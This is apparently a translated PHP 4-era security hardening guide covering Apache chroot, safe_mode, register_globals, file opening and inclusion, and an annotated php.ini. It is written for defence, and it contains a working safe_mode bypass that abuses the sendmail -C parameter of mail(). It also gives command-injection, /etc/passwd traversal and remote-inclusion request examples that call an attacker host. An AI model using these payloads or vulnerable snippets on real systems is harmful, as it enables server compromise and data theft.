1. Web server security
PHP actually runs as a module of the web server, so the security of the web server must be ensured first. Of course, for a web server to be secure, the system itself must first be secure, but that is getting off topic. PHP can be combined with various web servers; only Apache is discussed here. It is highly recommended to install and start Apache in chroot mode. That way, even if there are vulnerabilities in Apache, PHP or their scripts, only the restricted environment is affected and the actual system is not harmed. However, a chrooted Apache also causes some trouble for applications. For example, when connecting to MySQL, the address 127.0.0.1 must be used to connect over TCP instead of localhost over a socket, which is slightly less efficient. There is also a problem with sending email through the mail function, because in php.ini:
[mail function]
; For Win32 only.
SMTP=localhost
; For Win32 only.
sendmail_from [email protected]
is for the Win32 platform, so sendmail needs to be adjusted in the chroot environment.
2. Problems with PHP itself
1. Remote overflow
All versions below PHP-4.1.2 have file upload remote buffer overflow vulnerabilities, and the attack program has been widely circulated, with a very high success rate.
2. Remote denial of service
PHP-4.2.0 and PHP-4.2.1 have a remote vulnerability in PHP multipart/form-data POST request processing. Although local user permissions cannot be obtained, it can also cause a denial of service.
3. safe_mode bypass vulnerability
PHP-4.2.2 and below, down to PHP-4.0.5, also have a vulnerability in which the PHP mail function bypasses the safe_mode restriction and executes commands. Starting from version 4.0.5, the mail function accepts a fifth parameter. Because of a careless design, it can be used to break through the restrictions of safe_mode and execute commands. The breakthrough in version 4.0.5 is very simple: just separate with a semicolon and add the shell command. For example, if there is a PHP script evil.php:
execute the following URL:
http://foo.com/evil.php?bar =;/usr/bin/id [email protected]
This will send the result of id execution to [email protected] .
For PHP from 4.0.6 to 4.2.2, breaking through the safe_mode restriction actually uses the -C parameter of sendmail, so the system must use sendmail. The following code can break through safe_mode restrictions and execute commands:
# Note: the following two files must not exist,
# or their owner must be the same as the owner of this script.
$script="/tmp/script123";
$cf="/tmp/cf123";
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $:
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);
mail("nobody", "", "", "", "-C$cf");
?>
Users who use the above problematic version of PHP must upgrade to the latest version in time, so as to eliminate basic security problems.
3. The security configuration of PHP itself.
PHP configuration is very flexible. It can be set through php.ini, httpd.conf and .htaccess files (AllowOverride All or Options must be set for the directory), and also from within a script using ini_set() and other specific functions. The value of each configuration option can be obtained through the phpinfo() and get_cfg_var() functions.
If a configuration option has only the PHP_INI_SYSTEM attribute, it must be modified through php.ini or httpd.conf. These modify the PHP Master value, and Apache must be restarted for the change to take effect. Options set in php.ini apply to all scripts on the web server, while options set in httpd.conf apply to all scripts in the defined directory.
Options that also have the PHP_INI_USER, PHP_INI_PERDIR or PHP_INI_ALL attribute can be set in a .htaccess file or with the ini_set() function in the script itself. These modify the Local value, and the change takes effect immediately. However, .htaccess only applies to scripts in the current directory, and ini_set() only applies to the script that calls it, from the point of the call onward. The attributes of the options may differ between versions. You can use the following command to search the main.c file of the current source code for all options and their attributes:
# grep PHP_INI_ /PHP_SRC/main/main.c
Before discussing PHP security configuration, you should have a good understanding of PHP's safe_mode.
1. safe_mode
safe_mode has only the PHP_INI_SYSTEM attribute and must be set through php.ini or httpd.conf. To enable safe_mode, just modify php.ini:
safe_mode = On
Or modify httpd.conf and define the directory:
Options FollowSymLinks
php_admin_value safe_mode 1
safe_mode will take effect after restarting apache. Enabling safe_mode will restrict many PHP functions, especially system-related file opening, command execution and other functions.
All functions that operate files will only operate files with the same UID as the script. For example, the content of the test.php script is:
The properties of several files are as follows:
# ls -la
total 13
drwxr-xr-x 2 root root 104 Jul 20 01:25 .
drwxr-xr-x 16 root root 384 Jul 18 12:02 ..
-rw-r--r-- 1 root root 4110 Oct 26 2002 index.html
-rw-r--r-- 1 www-data www-data 41 Jul 19 19:14 test.php
Requesting test.php in the browser will prompt the following error message:
Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1
If the UID of the directory containing the manipulated file matches the UID of the script, the file can be accessed even if its own UID differs from the script's. I wonder if this is a vulnerability in PHP or if there is another hidden reason. Therefore, it is best for the user who owns the PHP scripts to be used only for this purpose. It is absolutely forbidden to use root as the owner of PHP scripts; doing so defeats the effect of safe_mode.
If you want to relax it to GID comparison, you can consider only comparing the GID of the file by turning on safe_mode_gid. You can set the following options:
safe_mode_gid = On
After safe_mode is enabled, all command-execution functions are restricted to running programs in the directory specified by safe_mode_exec_dir in php.ini, and shell_exec and backtick commands such as `ls -l` are prohibited from executing. If you really need to call other programs, you can make the following setting in php.ini:
safe_mode_exec_dir = /usr/local/php/exec
and then copy the program to this directory, then the php script can use system and other functions to execute the program. Moreover, shell scripts in this directory can still call system commands in other directories.
safe_mode_include_dir string
Override UID/GID checks when including files from this directory and its subdirectories (directories must be in include_path or included with full paths).
Starting with PHP 4.2.0, this directive can accept semicolon-delimited paths in a similar style to the include_path directive, rather than just a directory.
The specified limit is actually a prefix, not a directory name. This means that "safe_mode_include_dir = /dir/incl" will allow access to "/dir/include" and "/dir/incls" if they exist. If you wish to restrict access to a specific directory, add a trailing slash, for example: "safe_mode_include_dir = /dir/incl/".
safe_mode_allowed_env_vars string
Setting certain environment variables may be a potential security gap. This directive contains a comma separated list of prefixes. In safe mode, users can only change environment variables whose names have the prefix provided here. By default, users can only set environment variables starting with PHP_ (for example, PHP_FOO = BAR).
Note: If this directive is empty, PHP will allow the user to modify any environment variable!
safe_mode_protected_env_vars string
This directive contains a comma-separated list of environment variables that the end user cannot change using putenv(). These variables cannot be changed even when allowed modification is set in safe_mode_allowed_env_vars.
Although safe_mode is not a panacea (lower versions of PHP can be bypassed), it is still strongly recommended to turn on safe mode, which can avoid some unknown attacks to a certain extent. However, enabling safe_mode will have many restrictions, which may affect the application, so the code and configuration need to be adjusted to achieve harmony. For functions restricted or blocked by safe mode, please refer to the PHP manual.
After discussing safe_mode, let's discuss how to avoid vulnerabilities through the configuration of the PHP server based on actual problems that may arise in the program code.
2. Variable abuse
PHP defaults to register_globals = On. Variables from GET, POST, Cookie, Environment and Session can be registered directly as global variables. Their registration order is variables_order = "EGPCS" (can be modified through php.ini). For variables with the same name, a source further to the right in variables_order overrides one to its left, so variable abuse can easily confuse a program. Moreover, script programmers often are not in the habit of initializing variables. Program fragments like the following are extremely vulnerable to attack:
<?php
//test_1.php
if ($pass == "hello")
    $auth = 1;
if ($auth == 1)
    echo "some important information";
else
    echo "nothing";
?>
The attacker can bypass the check by simply using the following request:
http://victim/test_1.php?auth=1
Although this is a very weak mistake, some famous programs have also made this mistake. For example, phpnuke's remote file copy vulnerability: http://www.securityfocus.com/bid/3361
When PHP-4.1.0 was released, it recommended turning off register_globals and provided 7 special array variables for accessing the various kinds of variables. Variables from GET, POST, COOKIE, etc. are then not registered directly as variables and must be accessed through these arrays. When PHP-4.2.0 was released, the default configuration in php.ini became register_globals = Off. This lets the program use the default value initialized by PHP itself, which is usually 0, preventing attackers from controlling the decision variables.
Solution:
Set register_globals = Off in the configuration file php.ini.
The programmer is required to initialize a value for the judgment variable at the beginning of the program.
3. File opening
An extremely vulnerable code snippet:
<?php
//test_2.php
if (!($str = readfile("$filename"))) {
    echo("Could not open file: $filename\n");
    exit;
}
else {
    echo $str;
}
?>
Since the attacker can specify any $filename, the attacker can see /etc/passwd with the following request:
http://victim/test_2.php?filename=/etc/passwd
The following request can read the PHP file itself:
http://victim/test_2.php?filename=test_2.php
The file-opening functions in PHP include fopen(), file(), etc. If the file name variable is not strictly checked, important files on the server can be accessed and read.
Solution:
Unless otherwise necessary, limit PHP file operations to the web directory. The following is an example of modifying the apache configuration file httpd.conf:
php_admin_value open_basedir /usr/local/apache/htdocs
After restarting apache, the PHP script in the /usr/local/apache/htdocs directory can only operate files in its own directory, otherwise PHP will report an error:
Warning: open_basedir restriction in effect.
File is in wrong directory in xxx on line xx.
Using safe_mode mode can also avoid this problem, which has been discussed earlier.
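The same restriction can also be enforced inside the script, and it has to avoid the prefix pitfall described earlier for safe_mode_include_dir ("/dir/incl" also matching "/dir/include"). The following is an added example, not code from the original article; resolve_inside(), naive_prefix_check() and the temporary demo directories are hypothetical names, and the files are constructed for the demonstration.

```php
<?php
// Added example (not from the original article): a hardened counterpart to
// test_2.php that only serves files located inside one base directory.
// resolve_inside() and the demo directory names are hypothetical.

/**
 * Return the canonical path of $userPath if it is a regular file inside
 * $baseDir, or null if it is missing or escapes the base directory.
 */
function resolve_inside(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    // Empty names and NUL bytes are never valid file names.
    if ($userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    // realpath() collapses "." and "..", follows symlinks and returns false
    // for paths that do not exist. The user value is always treated as
    // relative to the base, so "/etc/passwd" becomes "<base>//etc/passwd".
    $target = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against the base WITH a trailing separator. Without it the
    // check is a plain string prefix, and "/dir/incl" also matches
    // "/dir/include/...".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

/** The flawed check: string prefix without a trailing separator. */
function naive_prefix_check(string $baseDir, string $path): bool
{
    $base = realpath($baseDir);
    $target = realpath($path);
    return $base !== false && $target !== false
        && strncmp($target, $base, strlen($base)) === 0;
}

// --- Demonstration on constructed directories ---
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'incl_demo_' . uniqid();
mkdir("$root/incl", 0700, true);
mkdir("$root/include", 0700, true);
file_put_contents("$root/incl/page.txt", "public page\n");
file_put_contents("$root/include/secret.txt", "not for the web\n");

$requests = ['page.txt', '../include/secret.txt', '/etc/passwd', "page.txt\0.php"];
foreach ($requests as $name) {
    $path = resolve_inside("$root/incl", $name);
    printf("%-26s => %s\n", addcslashes($name, "\0"), $path === null ? 'rejected' : 'allowed');
}
// The sibling directory passes the naive prefix comparison:
var_dump(naive_prefix_check("$root/incl", "$root/include/secret.txt"));

// Clean up the constructed files.
unlink("$root/incl/page.txt");
unlink("$root/include/secret.txt");
rmdir("$root/incl");
rmdir("$root/include");
rmdir($root);
```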
4. File inclusion
An extremely vulnerable code snippet:
<?php
//test_3.php
if(file_exists($filename))
include("$filename");
?>
This kind of irresponsible code will cause considerable harm. An attacker can obtain the /etc/passwd file by using the following request:
http://victim/test_3.php?filename=/etc/passwd
On the Unix version of PHP (the Windows version of PHP does not support remote opening of files), the attacker can create a file containing shell commands on a machine where he runs an HTTP or FTP service. For example, the content of http://attack/attack.txt is, then the following request can execute the command ls /etc on the target host:
http://victim/test_3.php?filename=http://attack/attack.txt
The attacker can even include Apache's access.log and error.log log files to get command-executing code run, but this sometimes does not succeed easily because of too much interfering information.
Another form is the following code snippet:
<?php
//test_4.php
include("$lib/config.php");
?>
The attacker can create a config.php file containing command execution code on his own host, and then use the following request to execute the command on the target host:
http://victim/test_4.php?lib=http://attack
PHP's file-inclusion functions are include(), include_once(), require() and require_once(). If the variable holding the file name is not strictly checked, the system is put in serious danger and commands can be executed remotely.
Solution:
Programmers should avoid using variables as the argument of file-inclusion functions. If variables are used, the file names to be included must be strictly checked and must not be arbitrarily specifiable by the user.
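One way to do this strict checking is to let the request select only a key from a fixed list, never a path. The following is an added example, not code from the original article; the page keys, file names and pages/ directory are hypothetical, and allow_url_include is a directive from later PHP versions than the ones the article covers.

```php
<?php
// Added example (not from the original article): the test_3.php / test_4.php
// pattern rewritten so that the request only selects a key, never a path.
// The page keys, file names and the pages/ directory are hypothetical.

const PAGE_DIR = __DIR__ . '/pages';

// Fixed map from request key to file under PAGE_DIR.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map the "page" request parameter to a file to include.
 * Returns null for anything that is not an exact key of PAGES.
 */
function page_to_include(array $query): ?string
{
    $key = $query['page'] ?? 'home';
    // ?page[]=x arrives as an array; only plain strings can be keys here.
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return null;
    }
    return PAGE_DIR . '/' . PAGES[$key];
}

/** Report URL-wrapper settings that make include() of remote code possible. */
function remote_include_settings(): array
{
    $on = [];
    foreach (['allow_url_fopen', 'allow_url_include'] as $name) {
        // ini_get() returns "1"/"On" style strings, "" or false if unknown.
        if (filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN)) {
            $on[] = $name;
        }
    }
    return $on;
}

// --- Demonstration with constructed request parameters ---
$samples = [
    ['page' => 'about'],
    [],
    ['page' => '/etc/passwd'],
    ['page' => 'http://attack/attack.txt'],
    ['page' => '../pages/about.php'],
    ['page' => ['about']],
];
foreach ($samples as $query) {
    $file = page_to_include($query);
    printf("%-40s => %s\n", json_encode($query), $file ?? 'rejected (404)');
}
// In a front controller the result would be used as:
//   if ($file !== null) { require $file; }

foreach (remote_include_settings() as $name) {
    echo "warning: $name is enabled\n";
}
```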
Limiting PHP's operation path, as described in the previous file-opening section, is a necessary option. In addition, unless it is really needed, be sure to turn off PHP's remote file opening function. Modify the php.ini file:
allow_url_fopen = Off
Restart apache
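The settings recommended in the sections above can be checked mechanically. The following is an added example, not part of the original article or of PHP itself: it parses php.ini text and reports the directives the article warns about. The function names, the rule set and the sample input are constructed assumptions.

```php
<?php
// Added example (not from the original article): flag php.ini settings that
// the sections above advise against. Only directives set explicitly in the
// text are judged; built-in defaults and httpd.conf overrides are not modelled.

/** Parse "name = value ; comment" lines into an array of raw strings. */
function parse_ini_directives(string $text): array
{
    $out = [];
    foreach (preg_split('/\R/', $text) as $line) {
        $line = trim($line);
        if ($line === '' || $line[0] === ';' || $line[0] === '[') {
            continue; // blank line, comment or [section] header
        }
        $eq = strpos($line, '=');
        if ($eq === false) {
            continue;
        }
        $name  = trim(substr($line, 0, $eq));
        $value = trim(substr($line, $eq + 1));
        if ($value !== '' && $value[0] === '"') {
            // Quoted value: keep everything up to the closing quote.
            $end   = strpos($value, '"', 1);
            $value = $end === false ? substr($value, 1) : substr($value, 1, $end - 1);
        } else {
            // Unquoted value: an inline ';' starts a comment.
            $semi = strpos($value, ';');
            if ($semi !== false) {
                $value = rtrim(substr($value, 0, $semi));
            }
        }
        $out[$name] = $value;
    }
    return $out;
}

function ini_is_on(?string $value): bool
{
    return in_array(strtolower((string) $value), ['1', 'on', 'true', 'yes'], true);
}

/** Return directive => reason for every setting the article warns about. */
function audit_php_ini(array $ini): array
{
    $findings = [];
    $shouldBeOff = [
        'register_globals' => 'request data is registered as global variables',
        'allow_url_fopen'  => 'URLs can be opened and included as files',
        'display_errors'   => 'error output exposes paths and configuration',
        'expose_php'       => 'the server advertises that PHP is installed',
    ];
    foreach ($shouldBeOff as $name => $reason) {
        if (ini_is_on($ini[$name] ?? null)) {
            $findings[$name] = $reason;
        }
    }
    if (!ini_is_on($ini['log_errors'] ?? null)) {
        $findings['log_errors'] = 'errors are not written to a log';
    }
    if (($ini['open_basedir'] ?? '') === '') {
        $findings['open_basedir'] = 'file operations are not confined here (check httpd.conf too)';
    }
    if (array_key_exists('safe_mode_allowed_env_vars', $ini)
        && $ini['safe_mode_allowed_env_vars'] === '') {
        $findings['safe_mode_allowed_env_vars'] = 'empty list lets scripts change any environment variable';
    }
    // Unix-style paths assumed; each entry is a prefix unless it ends in "/".
    $dirs = preg_split('/[;:]/', $ini['safe_mode_include_dir'] ?? '', -1, PREG_SPLIT_NO_EMPTY);
    foreach ($dirs as $dir) {
        if (substr($dir, -1) !== '/') {
            $findings['safe_mode_include_dir'] = "\"$dir\" is a prefix match; add a trailing slash";
        }
    }
    if (($ini['mysql.default_password'] ?? '') !== '') {
        $findings['mysql.default_password'] = 'password is readable by every script';
    }
    return $findings;
}

// --- Constructed sample input ---
$sample = <<<'INI'
[PHP]
register_globals = On ; Whether to register EGPCS variables as globals
allow_url_fopen = On
display_errors = On ; display error messages
log_errors = Off
expose_php = Off
safe_mode_allowed_env_vars =
safe_mode_include_dir = /dir/incl
mysql.default_password =
INI;

foreach (audit_php_ini(parse_ini_directives($sample)) as $name => $reason) {
    echo "$name: $reason\n";
}
```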
[PHP]
; PHP is still an evolving tool and its features are constantly being removed.
; And the setting changes of php.ini can reflect considerable changes,
; Before using a new PHP version, it would be beneficial to study php.ini
;;;;;;;;;;;;;;;;;;;;;
;About this document;
;;;;;;;;;;;;;;;;;;;;;
; This file controls many aspects of PHP's behavior. In order for PHP to read this file, it must be named
; 'php.ini'. PHP will search for the file in these places: the current working directory; the path specified by
; the environment variable PHPRC; the path specified when compiling.
; Under Windows, the path when compiling is the Windows installation directory.
; In command line mode, the search path for php.ini can be replaced with the -c parameter.
; The syntax of this file is very simple. Whitespace characters and lines starting with a semicolon ';' are simply ignored (as you might
; have guessed). Section headers (e.g. [Foo]) are also simply ignored, even though in the future they might
; have some meaning.
;
; Directives are specified using the following syntax:
; directive = value
; Directive names are *case-sensitive* - foo=bar is different from FOO=bar.
;
; The value can be a string, a number, a PHP constant (such as E_ALL or M_PI), one of the INI constants
; (On, Off, True, False, Yes, No and None), or an expression
; (e.g. E_ALL & ~E_NOTICE), or a quoted string ("foo").
;
; Expressions in INI files are restricted to bitwise operators and parentheses.
; | bitwise OR
; & bitwise AND
; ~ bitwise NOT
; ! boolean NOT
;
; Boolean flags can be turned on with values 1, On, True or Yes.
; They can be set to off with the values 0, Off, False or No.
;
; An empty string can be represented by writing nothing after the equal sign, or by using the None keyword:
;
; foo = ; Set foo to an empty string
; foo = none ; Set foo to an empty string
; foo = "none" ; Set foo to the string 'none'
;
; If you use constants in value settings, and these constants belong to dynamically loaded extension libraries (either PHP extensions or
; Zend extensions), you can only use these constants *after* the lines that load these extensions.
;
; All values set in the php.ini-dist file are the same as the built-in default values (that is, if php.ini
; is not used or you deleted these lines, the default value is the same).
;;;;;;;;;;;;;;;;;;;;;;
;Language options;
;;;;;;;;;;;;;;;;;;;;;;
engine = On
; Make PHP scripting language engine available under Apache.
short_open_tag = On
; Allows the <? tag. Otherwise, only <?php and <script> tags will be recognized.
asp_tags = Off
; Allow ASP-style <% %> tags
precision=14
; The number of effective digits when displaying floating point type numbers
y2k_compliance = Off
; Whether to turn on Y2K adaptation (may cause problems in non-Y2K-adaptive browsers)
output_buffering = Off
; Output buffering allows you to send header lines (including cookies) even after outputting body content,
; at the cost of slowing the output layer down a bit. You can enable output buffering at runtime by calling the output buffering functions,
; or turn the directive On here to enable output buffering for all files.
output_handler = ; You can redirect all output of your script to a function,
; That might be useful for processing or logging it.
; For example, if you set this output_handler to "ob_gzhandler",
; the output will be transparently compressed for browsers that support gzip or deflate encoding.
; Setting an output handler automatically turns on output buffering.
implicit_flush = Off
; Implicit flush tells PHP to tell the output layer to flush itself automatically after each output block.
; This is equivalent to calling the flush() function after every print() or echo() call and after every HTML block.
; Turning on this setting has serious performance implications. It is recommended to turn it on only during debugging.
allow_call_time_pass_reference = On
; Whether to allow forcing parameters to be passed by reference at function call time. This method is deprecated
; and may no longer be supported in future versions of PHP/Zend.
; It is encouraged to specify which parameters are passed by reference in the function declaration.
; You are encouraged to try turning this option off and verify that your scripts still work properly, to ensure that
; they will still work in future versions of the language. (You will get a warning every time you use this feature, and the parameters will be
; passed by value rather than by reference.)
; Safe Mode
safe_mode = Off
safe_mode_exec_dir =
safe_mode_allowed_env_vars = PHP_
; Setting certain environment variables
; may be a potential security breach.
; This directive contains a comma-separated list of prefixes. In safe mode, users can only replace
; the values of environment variables that begin with the prefixes listed here.
; By default, users will only be able to set environment variables starting with PHP_ (eg: PHP_FOO=BAR).
; NOTE: If this directive is empty, PHP will let the user change any environment variables!
safe_mode_protected_env_vars = LD_LIBRARY_PATH
; This directive contains a comma-separated list of environment variables that the end user will not be able to change using putenv ().
; These variables are protected even when safe_mode_allowed_env_vars is set to allowed.
disable_functions =
; This directive allows you to disable specific functions for security reasons.
; It accepts a comma-separated list of function names.
; This directive is *not* affected by whether safe mode is on.
; The color of syntax highlighting mode.
; Anything acceptable by <font color=???> will work.
highlight.string = #DD0000
highlight.comment = #FF8000
highlight.keyword = #007700
highlight.bg = #FFFFFF
highlight.default = #0000BB
highlight.html = #000000
; Misc
expose_php = Off
; Determines whether PHP should expose the fact that it is installed on the server (e.g. by adding its signature
; to the web server header).
; (My personal opinion is to turn this off whenever any powered-by header appears.)
; It poses no security threat, but it makes it possible to check whether PHP is installed on your server.
;;;;;;;;;;;;;;;;;;;;;
; Resource Limits ;
;;;;;;;;;;;;;;;;;;;;
max_execution_time = 30 ; Maximum execution time of each script, in seconds
memory_limit = 8388608; The maximum amount of memory that can be used by a script (here is 8MB)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Error handling and logging ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Error reporting is a bit field. OR the numbers together to get the desired error reporting level.
; E_ALL - all errors and warnings
; E_ERROR - fatal runtime error
; E_WARNING - runtime warning (non-fatal error)
; E_PARSE - compile-time parsing error
; E_NOTICE - runtime reminders (these are often caused by bugs in your code,
; but may also be caused by intentional behavior, e.g. using an uninitialized variable and relying on
; the fact that it is automatically initialized to an empty string)
; E_CORE_ERROR - fatal error that occurs during the initialization process when PHP starts
; E_CORE_WARNING - a warning (non-fatal error) that occurs during the initialization process when PHP starts
; E_COMPILE_ERROR - fatal compile-time error
; E_COMPILE_WARNING - compile-time warning (non-fatal error)
; E_USER_ERROR - user generated error message
; E_USER_WARNING - user generated warning message
; E_USER_NOTICE - user generated reminder message
; example:
; error_reporting = E_ALL & ~E_NOTICE ; Show all errors except reminders
; error_reporting = E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR ; Show errors only
error_reporting = E_ALL & ~E_NOTICE ; Show all errors except reminders
display_errors = On ; display error messages (as part of the output)
; On the final published web site, it is strongly recommended that you turn off this feature and use
; error logging instead (see below).
; Keeping display_errors enabled on the final published website may
; expose some security-related information, such as file paths on your web server,
; your database configuration or other information.
display_startup_errors = Off ; Even when display_errors is turned on, errors that occur during PHP's startup sequence
; are not displayed.
; It is strongly recommended to keep display_startup_errors turned off,
; except while debugging.
log_errors = Off ; Record errors in a log file (server-specific log, stderr standard error output, or error_log (below))
; As stated above, it is strongly recommended that you use error logging on the final published website
; in place of direct error output.
track_errors = Off ; Save the latest error/warning message in variable $php_errormsg (boolean)
;error_prepend_string = "<font color=ff0000>" ; The string output before the error message
;error_append_string = "</font>" ; The string output after the error message
;error_log = filename ; Record error log to the specified file
;error_log = syslog ; Record the error log in the system log syslog (event log under NT, invalid under Windows 95)
warn_plus_overloading = Off ; Warn when using '+' with strings
;;;;;;;;;;;;;;;;;;
; Data Handling ;
;;;;;;;;;;;;;;;;;;;
variables_order = "EGPCS" ; This directive describes the order in which PHP registers
; GET, POST, Cookie, Environment and Built-in variables
; (represented by G, P, C, E & S, usually referenced as EGPCS or GPC).
; Registration is done from left to right; new values replace old values.
register_globals = On ; Whether to register these EGPCS variables as global variables.
; You may want to turn this off if you don't want user data to be cluttered globally.
; This makes more sense in conjunction with track_vars - this way you can access
; all GPC variables through the $HTTP_*_VARS[] arrays.
register_argc_argv = On ; This directive tells PHP whether to declare argv and argc variables
; (Note: here argv is an array and argc is the number of variables)
; (which contains data passed using the GET method).
; If you don't want to use these variables, you should turn it off to improve performance.
track_vars = On ; Enables the $HTTP_*_VARS[] arrays, where * is one of
; ENV, POST, GET, COOKIE or SERVER
post_max_size = 8M ; Maximum size of POST data that PHP will accept.
gpc_order = "GPC" ; This directive is deprecated. Use variables_order instead.
; Magic quotes
magic_quotes_gpc = On ; Use magic quotes in input GET/POST/Cookie data
; (The original text is like this, haha, the so-called magic quotes should refer to using escape characters to add reference control characters, such as '....)
magic_quotes_runtime= Off ; Use magic quotes for data generated at runtime,
; For example: data obtained by SQL query, data obtained by exec() function, etc.
magic_quotes_sybase = Off ; Use Sybase style magic quotes (escape ' with '' instead of \')
; Automatically add files before and after PHP documents
auto_prepend_file =
auto_append_file =
; As of 4.04b4, PHP by default always outputs a character encoding in the "Content-type:" header.
; To disable sending the character set, simply set it to empty.
; PHP's built-in default is text/html
default_mimetype = "text/html"
;default_charset = "iso-8859-1"
;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Paths and Directories ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;
include_path = ; include path setting, UNIX: "/path1:/path2" Windows: "path1;path2"
doc_root = ; The root path of the php page, only valid when it is not empty.
user_dir = ; Tells php which directory to look for when opening the script using /~username. It is only valid when it is not empty.
;upload_tmp_dir = ; Temporary directory to store files uploaded using HTTP protocol (use the system default if not specified)
upload_max_filesize = 2097152 ; File upload is limited to 2 Meg by default
extension_dir = c:php ; directory where loadable extension libraries (modules) are stored
enable_dl = On ; Whether to enable dl().
; The dl() function *doesn't* work well on a multi-threaded server,
; such as IIS or Zeus, and disabled by default on them
;;;;;;;;;;;;;;;;;;
; File Uploads ;
;;;;;;;;;;;;;;;;;;
file_uploads = On; Whether to allow HTTP file uploads
;upload_tmp_dir = ; Temporary directory for files uploaded via HTTP (system default is used if not specified)
upload_max_filesize = 2M; Maximum allowed size of uploaded files
; Fopen wrappers;
;;;;;;;;;;;;;;;;;;;;
allow_url_fopen = On ; Whether to allow URLs (such as http:// or ftp://) to be treated as files
;;;;;;;;;;;;;;;;;;;;;;;;
; Dynamic Extensions ;
;;;;;;;;;;;;;;;;;;;;;;;;
; If you want an extension library to be loaded automatically, use the following syntax:
; extension=modulename.extension
; For example, on Windows,
; extension=msql.dll
; or under UNIX,
; extension=msql.so
; Note that this should only be the name of the module, there is no need to put directory information in it.
; Use the extension_dir above to indicate the location of the specified extension library.
;Windows extension
;extension=php_nsmail.dll
extension=php_calendar.dll
;extension=php_dbase.dll
;extension=php_filepro.dll
extension=php_gd.dll
;extension=php_dbm.dll
;extension=php_mssql.dll
;extension=php_zlib.dll
;extension=php_filepro.dll
;extension=php_imap4r2.dll
;extension=php_ldap.dll
;extension=php_crypt.dll
;extension=php_msql2.dll
;extension=php_odbc.dll
; Note that MySQL support is now built-in, so there is no need to use its dll
;;;;;;;;;;;;;;;;;;;;;
; Module Settings ;
;;;;;;;;;;;;;;;;;;;;;
[Syslog]
define_syslog_variables = Off; Whether to define various system log variables
; Such as: $LOG_PID, $LOG_CRON, etc.
; Turning it off is a good idea to improve efficiency.
; At runtime, you can call the function define_syslog_variables() to define these variables
[mail function]
SMTP = localhost ; only for win32 systems
sendmail_from [email protected] ; only for win32 systems
;sendmail_path = ;only for unix, also supports parameters (default is 'sendmail -t -i')
[Debugger]
debugger.host = localhost
debugger.port = 7869
debugger.enabled = False
[Logging]
; These configurations indicate the logging mechanism used for the examples.
; See examples/README.logging for more explanation
;logging.method = db
;logging.directory = /path/to/log/directory
[Java]
;java.class.path = .php_java.jar
;java.home = c:jdk
;java.library = c:jdkjrebinhotspotjvm.dll
;java.library.path = .
[SQL]
sql.safe_mode = Off
[ODBC]
;uodbc.default_db = Not yet implemented
;uodbc.default_user = Not yet implemented
;uodbc.default_pw = Not yet implemented
uodbc.allow_persistent = On ; Allow or disable persistent connections
uodbc.check_persistent = On ; Check if the connection is still available before reusing it
uodbc.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
uodbc.max_links = -1; The maximum number of connections (persistent and non-persistent). -1 means unlimited
uodbc.defaultlrl = 4096; Handling of LONG fields. Returns the number of bytes to variables, 0 means passthru
uodbc.defaultbinmode = 1; Handling of binary data. 0 means passthru, 1 return as is, 2 convert to char
; See the documentation for odbc_binmode and odbc_longreadlen for an explanation of uodbc.defaultlrl and uodbc.defaultbinmode.
[MySQL]
mysql.allow_persistent = On ; Allow or disable persistent connections
mysql.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
mysql.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
mysql.default_port = ; The default port used by mysql_connect(). If not set, mysql_connect()
; will use the variable $MYSQL_TCP_PORT, or the mysql-tcp entry under /etc/services (unix),
; Or MYSQL_PORT is defined during compilation (in this order)
; Win32 environment, only MYSQL_PORT will be checked.
mysql.default_socket = ; The default socket name used for local MySql connections. If empty, use the MYSQL built-in value
mysql.default_host = ; The host used by mysql_connect() by default (invalid in safe mode)
mysql.default_user = ; mysql_connect () Username used by default (invalid in safe mode)
mysql.default_password = ; The password used by mysql_connect() by default (invalid in safe mode)
; Note that saving passwords under this file is generally a *bad* idea
; *Any* user with access to PHP can run
; 'echo get_cfg_var("mysql.default_password")' to display that password!
; And of course, any user with read rights to the file will also be able to see that password.
[mSQL]
msql.allow_persistent = On ; Allow or disable persistent connections
msql.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
msql.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
[PostgresSQL]
pgsql.allow_persistent = On ; Allow or disable persistent connections
pgsql.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
pgsql.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
[Sybase]
sybase.allow_persistent = On; Allow or disable persistent connections
sybase.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
sybase.max_links = -1; Maximum number of connections (persistent and non-persistent). -1 means unlimited
;sybase.interface_file = "/usr/sybase/interfaces"
sybase.min_error_severity = 10 ; Minimum severity of errors displayed
sybase.min_message_severity = 10 ; Minimum severity of displayed messages
sybase.compatability_mode = Off ; Compatibility mode with older versions of PHP 3.0. If turned on, this will cause PHP to automatically
; assign types to results according to their Sybase type,
; instead of treating them all as strings.
; This compatibility mode will not stay forever,
; so make the necessary changes to your code
; and turn this option off.
[Sybase-CT]
sybct.allow_persistent = On ; Allow or disable persistent connections
